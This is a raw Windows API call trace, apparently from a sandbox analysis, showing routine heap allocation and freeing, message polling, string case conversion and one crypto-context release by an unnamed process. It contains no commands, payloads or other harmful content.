CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.147] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.148] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.148] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.148] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.148] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.149] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.149] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.149] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0265.149] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.149] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.149] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.150] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.150] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.150] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.150] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.150] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0265.150] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.151] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.152] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0265.152] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.152] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0265.152] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.153] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.153] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.153] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.153] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.154] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.155] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.155] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.155] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.155] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.156] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.156] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.156] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.156] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.156] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.157] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.157] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.157] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.158] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.160] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0265.161] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 